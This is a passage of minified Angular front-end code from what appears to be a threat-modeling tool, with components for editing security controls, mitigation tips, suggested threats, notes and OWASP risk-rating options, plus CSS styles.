control(e){this._control=e,this.attackVectorGroups=null,this.selectedMitigationTip=null}ngOnInit(){}GetAvailableAttackVectorGroups(){if(null!=this.attackVectorGroups)return this.attackVectorGroups;this.attackVectorGroups=[];let e=i=>{var n,r;(null===(n=i.AttackVectors)||void 0===n?void 0:n.length)>0&&this.attackVectorGroups.push({Name:i.Name,AttackVectors:i.AttackVectors}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return e(this.dataService.Config.ThreatLibrary),this.attackVectorGroups}GetAvailableThreatRuleGroups(){if(null!=this.threatRuleGroups)return this.threatRuleGroups;this.threatRuleGroups=[];let e=i=>{var n,r;(null===(n=i.ThreatRules)||void 0===n?void 0:n.length)>0&&this.threatRuleGroups.push({Name:i.Name,ThreatRules:i.ThreatRules}),(null===(r=i.SubGroups)||void 0===r?void 0:r.length)>0&&i.SubGroups.forEach(c=>e(c))};return this.dataService.Config.GetThreatRuleGroups().forEach(i=>e(i)),this.threatRuleGroups}GetControlGroups(){return this.dataService.Config.GetControlGroups()}GetControlGroup(){return this.dataService.Config.FindGroupOfControl(this.control)}OnControlGroupChanged(e){let i=this.dataService.Config.FindGroupOfControl(this.control);i&&i.RemoveControl(this.control),e.value.AddControl(this.control)}AddTip(){this.control.MitigationTips.push({Name:Gi.FindUniqueName("Tip",this.control.MitigationTips.map(e=>e.Name)),Description:"",LifeCycles:[]}),this.selectedMitigationTip=this.control.MitigationTips[this.control.MitigationTips.length-1]}DeleteTip(e){const i=this.control.MitigationTips.indexOf(e);i>=0&&(this.control.MitigationTips.splice(i,1),e==this.selectedMitigationTip&&(this.selectedMitigationTip=null))}drop(e,i){Qs(i,e.previousIndex,e.currentIndex)}ContainsLifeCycle(e){return this.selectedMitigationTip.LifeCycles.includes(e)}SetLifeCycle(e,i){i.checked?this.selectedMitigationTip.LifeCycles.push(e):this.selectedMitigationTip.LifeCycles.splice(this.selectedMitigationTip.LifeCycles.findIndex(n=>n==e),1)}GetLifeCycleNames(e){return 0==e.LifeCycles.length?"-":e.LifeCycles.map(i=>this.translate.instant(this.GetLifeCycleName(i))).join(", ")}GetLifeCycles(){return y2.GetMitigationKeys()}GetLifeCycleName(e){return y2.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Wg,8),Ee(hf,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-control"]],inputs:{node:"node",control:"control",canEdit:"canEdit",canEditName:"canEditName",canEditGroup:"canEditGroup"},decls:1,vars:1,consts:[[3,"disable",4,"ngIf"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["multiple","",3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[4,"ngFor","ngForOf"],["appearance","fill",1,"property-form-field"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"value","matTooltip","selectionChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],[3,"label"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[2,"margin-top","10px"],[2,"text-align","center"],["style","padding: 0 3px 0 3px;",4,"ngFor","ngForOf"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["color","primary",3,"checked","change"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],[3,"canEdit","threatRule"]],template:function(e,i){1&e&&ne(0,Ske,74,34,"div",0),2&e&&F("ngIf",i.control)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function kke(t,a){1&t&&(m(0,"mat-icon"),s(1,"check_circle_outline"),u())}function Pke(t,a){if(1&t){const e=Ye();m(0,"tr"),s(1,"\n "),m(2,"td"),s(3,"\n "),ne(4,kke,2,0,"mat-icon",4),s(5,"\n "),u(),s(6,"\n "),m(7,"td",5),s(8,"\n "),m(9,"span",6),s(10),u(),it(11,"br"),s(12),u(),s(13,"\n "),m(14,"td"),s(15,"\n "),m(16,"button",7),he("click",function(){const r=be(e).$implicit;return Me(V(2).AddThreat(r))}),s(17),oe(18,"translate"),u(),s(19,"\n "),u(),s(20,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);g(4),F("ngIf",i.HasThreat(e)),g(6),ke(e.Name),g(2),ct("",e.Description,"\n "),g(5),ke(re(18,4,"general.Add"))}}function Oke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(V(2).PrevStep())}),s(1,"Previous"),u()}}function Nke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(V(2).NextStep())}),s(1,"End"),u()}}function Lke(t,a){if(1&t){const e=Ye();m(0,"button",8),he("click",function(){return be(e),Me(V(2).NextStep())}),s(1,"Next"),u()}}function zke(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",1),he("opened",function(){const r=be(e).index;return Me(V().SetStep(r))}),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n "),u(),s(7,"\n\n "),m(8,"table"),s(9,"\n "),ne(10,Pke,21,6,"tr",2),s(11,"\n "),u(),s(12,"\n\n "),m(13,"mat-action-row"),s(14,"\n "),ne(15,Oke,2,0,"button",3),s(16,"\n "),ne(17,Nke,2,0,"button",3),s(18,"\n "),ne(19,Lke,2,0,"button",3),s(20,"\n "),u(),s(21,"\n "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.first,r=a.last;F("expanded",V().step===i),g(5),za("\n ",e[0].Name," (",e[1].length,")\n "),g(5),F("ngForOf",e[1]),g(5),F("ngIf",!n),g(2),F("ngIf",r),g(2),F("ngIf",!r)}}let Wke=(()=>{class t{constructor(e,i,n){this.dataService=i,this.threatEngine=n,this.step=0,this.mnemonicArray=[],this.hasThreatBuffer={},this.element=e,this.dataService.Config.GetStencilThreatMnemonics().forEach(r=>{const c=r.Letters.filter(d=>{var T;return d.AffectedElementTypes.includes(null===(T=this.element.GetProperty("Type"))||void 0===T?void 0:T.ElementTypeID)});c.length>0&&this.mnemonicArray.push([r,c])})}ngOnInit(){}AddThreat(e){this.hasThreatBuffer[e.ID]=!0,this.threatEngine.AddMnemonicThreat(this.element,e).subscribe(i=>{i||(this.hasThreatBuffer[e.ID]=null)})}HasThreat(e){return null==this.hasThreatBuffer[e.ID]&&(this.hasThreatBuffer[e.ID]=this.dataService.Project.GetAttackScenarios().filter(i=>i.Target==this.element).filter(i=>i.ThreatMnemonicLetterID==e.ID).length>0),this.hasThreatBuffer[e.ID]}SetStep(e){this.step=e}NextStep(){this.step++}PrevStep(){this.step--}}return t.\u0275fac=function(e){return new(e||t)(Ee(lc,8),Ee(Yi),Ee(RT))},t.\u0275cmp=Wt({type:t,selectors:[["app-suggested-threats-dialog"]],decls:4,vars:1,consts:[[3,"expanded","opened",4,"ngFor","ngForOf"],[3,"expanded","opened"],[4,"ngFor","ngForOf"],["mat-button","",3,"click",4,"ngIf"],[4,"ngIf"],[2,"width","100%"],[2,"font-size","large"],["mat-raised-button","",3,"click"],["mat-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"mat-accordion"),s(1,"\n "),ne(2,zke,22,7,"mat-expansion-panel",0),s(3,"\n"),u()),2&e&&(g(2),F("ngForOf",i.mnemonicArray))},dependencies:[Zi,Ri,oa,da,il,Ec,E8,Dc,tl,Xi]}),t})();const Fke=["newNote"],Vke=["ctxMenu"];function Bke(t,a){if(1&t){const e=Ye();m(0,"td")(1,"mat-checkbox",14),he("ngModelChange",function(n){return be(e),Me(V(2).$implicit.IsChecked=n)}),u()()}if(2&t){const e=V(2).$implicit;g(1),F("ngModel",e.IsChecked)}}function Hke(t,a){if(1&t&&(bt(0),s(1),Mt()),2&t){const e=V(3).$implicit;g(1),ct(" - ",e.Author,"")}}function Uke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),oe(3,"localDateTime"),ne(4,Hke,2,1,"ng-container",11),s(5,": "),u()()),2&t){const e=V(2).$implicit;g(2),ke(re(3,2,e.Date)),g(2),F("ngIf",(null==e.Author?null:e.Author.length)>0)}}function qke(t,a){if(1&t&&(m(0,"td")(1,"span",15),s(2),u()()),2&t){const e=V(2).index;g(2),ct("",e+1,". ")}}const FG=function(t){return{item:t}};function Gke(t,a){if(1&t&&(m(0,"td"),s(1,"\n "),m(2,"button",16),oe(3,"translate"),s(4,"\n "),m(5,"mat-icon"),s(6,"more_vert"),u(),s(7,"\n "),u(),s(8,"\n "),u()),2&t){const e=V(2).$implicit;V();const i=Ti(15);g(2),at("matTooltip",re(3,3,"general.More")),F("matMenuTriggerFor",i)("matMenuTriggerData",fr(5,FG,e))}}function jke(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n "),m(2,"tr"),s(3,"\n "),m(4,"td")(5,"mat-icon"),s(6,"arrow_right"),u()(),s(7,"\n "),ne(8,Bke,2,1,"td",11),s(9,"\n "),ne(10,Uke,6,4,"td",11),s(11,"\n "),ne(12,qke,3,1,"td",11),s(13,"\n "),m(14,"td"),s(15),u(),s(16,"\n "),ne(17,Gke,9,7,"td",11),s(18,"\n "),m(19,"td"),s(20,"\n "),m(21,"button",13),he("click",function(){be(e);const n=V().index;return Me(V().isEdtingArray[0][n]=!0)}),oe(22,"translate"),s(23,"\n "),m(24,"mat-icon"),s(25,"edit"),u(),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),m(29,"td"),s(30,"\n "),m(31,"button",13),he("click",function(){be(e);const n=V().$implicit;return Me(V().OnDeleteItem(n))}),oe(32,"translate"),s(33,"\n "),m(34,"mat-icon"),s(35,"delete"),u(),s(36,"\n "),u(),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),u()}if(2&t){const e=V().$implicit,i=V();g(8),F("ngIf",e.HasCheckbox),g(2),F("ngIf",e.ShowTimestamp),g(2),F("ngIf",i.enumerateItems),g(3),ke(e.Note),g(2),F("ngIf",i.canToggleCheckbox||i.canToggleTimestamp),g(4),at("matTooltip",re(22,7,"general.Edit")),g(10),at("matTooltip",re(32,9,"general.Delete"))}}function Qke(t,a){if(1&t){const e=Ye();m(0,"input",17),he("keydown",function(n){be(e);const r=V().index;return Me(V().OnRenameItem(n,0,r))})("focusout",function(n){be(e);const r=V().index;return Me(V().OnRenameItem(n,0,r))}),u()}if(2&t){const e=V().$implicit;F("spellcheck",V().dataService.HasSpellCheck)("ngModel",e.Note)}}function $ke(t,a){if(1&t){const e=Ye();m(0,"div",10),he("contextmenu",function(n){const r=be(e),c=r.$implicit,d=r.index;return Me(V().OpenContextMenu(n,c,d))}),s(1,"\n "),ne(2,jke,40,11,"table",11),s(3,"\n "),ne(4,Qke,1,2,"input",12),s(5,"\n "),u()}if(2&t){const e=a.index,i=V();ri("color",i.theme.IsDarkMode?"white":"black"),g(2),F("ngIf",!i.isEdtingArray[0][e]),g(2),F("ngIf",i.isEdtingArray[0][e])}}function Kke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(V().item.HasCheckbox=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n "),u()}if(2&t){const e=V().item;g(2),F("ngModel",e.HasCheckbox),g(1),ct("\n ",re(4,2,"dialog.notes.hasCheckbox"),"\n ")}}function Xke(t,a){if(1&t){const e=Ye();m(0,"button",19),s(1,"\n "),m(2,"mat-slide-toggle",20),he("ngModelChange",function(n){return be(e),Me(V().item.ShowTimestamp=n)})("click",function(n){return n.stopPropagation()}),s(3),oe(4,"translate"),u(),s(5,"\n "),u()}if(2&t){const e=V().item;g(2),F("ngModel",e.ShowTimestamp),g(1),ct("\n ",re(4,2,"dialog.notes.showTimestamp"),"\n ")}}function Yke(t,a){if(1&t&&(s(0,"\n "),ne(1,Kke,6,4,"button",18),s(2,"\n "),ne(3,Xke,6,4,"button",18),s(4,"\n ")),2&t){const e=V();g(1),F("ngIf",e.canToggleCheckbox),g(2),F("ngIf",e.canToggleTimestamp)}}function Jke(t,a){if(1&t&&(m(0,"button",23),s(1,"\n "),m(2,"mat-icon"),s(3,"more_vert"),u(),s(4,"\n "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n "),u()),2&t){const e=V(2).item;V(),F("matMenuTriggerFor",Ti(15))("matMenuTriggerData",fr(5,FG,e)),g(6),ke(re(7,3,"general.More"))}}function Zke(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),ne(2,Jke,9,7,"button",21),s(3,"\n "),m(4,"button",22),he("click",function(){be(e);const n=V().index;return Me(V().isEdtingArray[0][n]=!0)}),s(5,"\n "),m(6,"mat-icon"),s(7,"edit"),u(),s(8,"\n "),m(9,"span"),s(10),oe(11,"translate"),u(),s(12,"\n "),u(),s(13,"\n "),m(14,"button",22),he("click",function(){be(e);const n=V().item;return Me(V().OnDeleteItem(n))}),s(15,"\n "),m(16,"mat-icon"),s(17,"delete"),u(),s(18,"\n "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n "),u(),s(23,"\n "),Mt()}if(2&t){const e=V(2);g(2),F("ngIf",e.canToggleCheckbox||e.canToggleTimestamp),g(8),ke(re(11,3,"general.Edit")),g(10),ke(re(21,5,"general.Delete"))}}function e9e(t,a){if(1&t&&(s(0,"\n "),ne(1,Zke,24,7,"ng-container",11),s(2,"\n ")),2&t){const e=a.item;g(1),F("ngIf",e)}}let jp=(()=>{class t{constructor(e,i,n){this.theme=i,this.dataService=n,this.showTimestamp=!0,this.hasCheckbox=!1,this.canToggleCheckbox=!1,this.canToggleTimestamp=!1,this.enumerateItems=!1,this.isEdtingArray=[[],[]],this.menuTopLeftPosition={x:"0",y:"0"},e&&(this.showTimestamp=e.ShowTimestamp,this.hasCheckbox=e.HasCheckbox,this.canToggleCheckbox=e.CanToggleCheckbox,this.canToggleTimestamp=e.CanToggleTimestamp,this.notes=e.Notes)}get notes(){return this._notes}set notes(e){this.checkForUnsavedChanges(),this._notes=e,this._strings=null==e?void 0:e.map(i=>i.Note)}get strings(){return this._strings}set strings(e){this.checkForUnsavedChanges(),this._strings=e,this._notes=[],null==e||e.forEach(i=>{this._notes.push({Author:"",Date:"",ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1,Note:i})})}ngOnInit(){}ngOnDestroy(){this.checkForUnsavedChanges()}OnDeleteItem(e){const i=this.notes.indexOf(e);i>=0&&(this.notes.splice(i,1),this.strings.splice(i,1))}OnRenameItem(e,i,n){("Enter"===e.key||"focusout"===e.type)&&(this.notes[n].Note=e.target.value,this.strings[n]=e.target.value,this.isEdtingArray[i][n]=!1)}OnKeyDown(e){"Enter"==e.key&&(this.addNote(e.target.value),e.target.value="")}OpenContextMenu(e,i,n){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i,index:n},this.matMenuTrigger.openMenu()}drop(e){Qs(this.notes,e.previousIndex,e.currentIndex),Qs(this.strings,e.previousIndex,e.currentIndex)}addNote(e){this.notes.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:e,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),this.strings.push(e)}checkForUnsavedChanges(){var e,i;if((null===(i=null===(e=this.newNote)||void 0===e?void 0:e.nativeElement)||void 0===i?void 0:i.value.length)>0){const n=this.notes,r=this.strings,c=this.newNote.nativeElement.value;setTimeout(()=>{n.push({Date:Date.now().toString(),Author:this.dataService.UserDisplayName,Note:c,ShowTimestamp:this.showTimestamp,HasCheckbox:this.hasCheckbox,IsChecked:!1}),r.push(c)},10),this.newNote.nativeElement.value=null}}}return t.\u0275fac=function(e){return new(e||t)(Ee(S5,8),Ee(Oa),Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-notes"]],viewQuery:function(e,i){if(1&e&&(Mi(Fke,5),Mi(Vke,5)),2&e){let n;Vt(n=Bt())&&(i.newNote=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{notes:"notes",strings:"strings",showTimestamp:"showTimestamp",hasCheckbox:"hasCheckbox",canToggleCheckbox:"canToggleCheckbox",canToggleTimestamp:"canToggleTimestamp",enumerateItems:"enumerateItems"},decls:29,vars:10,consts:[["cdkDropList","",1,"reorder-list",3,"cdkDropListDropped"],["class","reorder-box","cdkDrag","",3,"color","contextmenu",4,"ngFor","ngForOf"],[2,"padding","5px 10px"],["matInput","",2,"width","calc(100% - 24px)","vertical-align","super","font-size","14px",3,"spellcheck","placeholder","keydown"],["newNote",""],["moreMenu","matMenu"],["matMenuContent",""],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["cdkDrag","",1,"reorder-box",3,"contextmenu"],[4,"ngIf"],["id","renameBox","type","text","style","width: -webkit-fill-available;","autofocus","","onfocus","this.select();",3,"spellcheck","ngModel","keydown","focusout",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"],["color","primary",2,"padding-right","5px",3,"ngModel","ngModelChange"],[2,"padding-right","5px"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matMenuTriggerFor","matMenuTriggerData","matTooltip"],["id","renameBox","type","text","autofocus","","onfocus","this.select();",2,"width","-webkit-fill-available",3,"spellcheck","ngModel","keydown","focusout"],["mat-menu-item","",4,"ngIf"],["mat-menu-item",""],["color","primary",3,"ngModel","ngModelChange","click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngIf"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"]],template:function(e,i){if(1&e&&(m(0,"div",0),he("cdkDropListDropped",function(r){return i.drop(r)}),s(1,"\n "),ne(2,$ke,6,4,"div",1),s(3,"\n"),u(),s(4,"\n"),m(5,"div",2),s(6,"\n "),m(7,"mat-icon"),s(8,"arrow_right"),u(),m(9,"input",3,4),he("keydown",function(r){return i.OnKeyDown(r)}),oe(11,"translate"),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-menu",null,5),s(16,"\n "),ne(17,Yke,5,2,"ng-template",6),s(18," \n"),u(),s(19,"\n"),it(20,"div",7,8),s(22," \n"),m(23,"mat-menu",null,9),s(25," \n "),ne(26,e9e,3,1,"ng-template",6),s(27," \n"),u(),s(28," \n\n")),2&e){const n=Ti(24);g(2),F("ngForOf",i.notes),g(7),at("placeholder",re(11,8,"pages.modeling.charscope.addDescription")),F("spellcheck",i.dataService.HasSpellCheck),g(11),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,Xa,Xo,qo,po,el,Pa,Mg,Xi,E5],styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}']}),t})();function t9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.sl"+e.toString()))}}function i9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.ed"+e.toString()))}}function a9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.lc"+e.toString()))}}function n9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.fd"+e.toString()))}}function o9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.m"+e.toString()))}}function r9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.ee"+e.toString()))}}function s9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.li"+e.toString()))}}function c9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.rd"+e.toString()))}}function l9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.o"+e.toString()))}}function d9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.a"+e.toString()))}}function m9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.lav"+e.toString()))}}function u9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.nc"+e.toString()))}}function h9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.s"+e.toString()))}}function f9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.id"+e.toString()))}}function p9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.lac"+e.toString()))}}function _9e(t,a){if(1&t&&(m(0,"mat-option",10),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(re(2,2,"shared.owasprr.pv"+e.toString()))}}const 